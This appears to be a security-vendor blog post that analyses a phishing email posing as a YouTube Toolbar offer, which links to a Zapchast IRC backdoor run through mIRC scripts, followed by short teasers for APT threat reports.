Incidents

YouTube Toolbars

Yesterday I uploaded my first ever HD movie to YouTube. Once this was finished, I immediately got an email from YouTube saying “Congratulations on your first YouTube upload!” along with further hints and tips on getting the best out of it. Only a couple of hours later, I got another email, this time, saying “Hello, Have you tryed YouTube Toolbar?”

The typo in the subject line should be a good indication to anyone that this was most likely not from YouTube. Indeed, the message – which was rather poorly formatted – contained a link to a Backdoor.IRC.Zapchast variant.

Backdoor.IRC.Zapchast.i spam email

Backdoor.IRC.Zapchast.i spam email

The executable that the link in the email points to is a RAR SFX archive. It has a number of files inside:

Almost all Zapchast variants look like this – with very minor differences. What about the origin of this backdoor? There are a number of clues in the files which seem to indicate these come from Romanian malware authors, from things such as Romanian specific passwords, to links to Romanian specific websites.

The way these Backdoors work is through mIRC scripts – they have a copy of the mIRC executable (version 6.01, packed with UPX) and the backdoor code itself is written as a mIRC script. The screenshot above shows the ’csrss.exe’ file. Once activated, they connect to the Undernet network and join a particular channel to receive commands, as well as notifying the owner of the botnet about a new infected user. The handling of the commands is implemented in the ‘script.ini’ file.

Aside from the handling of mIRC commands that it receives from its master, there is no further code designed to steal confidential data or financial information from the victim’s computer. This is rather uncommon nowadays and things such as Zapchast are slowly dying out, making way for the more advanced Trojans, like Zbot or Sinowal.

YouTube Toolbars

Your email address will not be published. Required fields are marked *

 

Reports

APT trends report Q2 2021

This is our latest summary of advanced persistent threat (APT) activity, focusing on significant events that we observed during Q2 2021: attacks against Microsoft Exchange servers, APT29 and APT31 activities, targeting campaigns, etc.

LuminousMoth APT: Sweeping attacks for the chosen few

We recently came across unusual APT activity that was detected in high volumes, albeit most likely aimed at a few targets of interest. Further analysis revealed that the actor, which we dubbed LuminousMoth, shows an affinity to the HoneyMyte group, otherwise known as Mustang Panda.

WildPressure targets the macOS platform

We found new malware samples used in WildPressure campaigns: newer version of the C++ Milum Trojan, a corresponding VBScript variant with the same version number, and a Python script working on both Windows and macOS.

Ferocious Kitten: 6 years of covert surveillance in Iran

Ferocious Kitten is an APT group that has been targeting Persian-speaking individuals in Iran. Some of the TTPs used by this threat actor are reminiscent of other groups, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details on these findings.

Subscribe to our weekly e-mails

The hottest research right in your inbox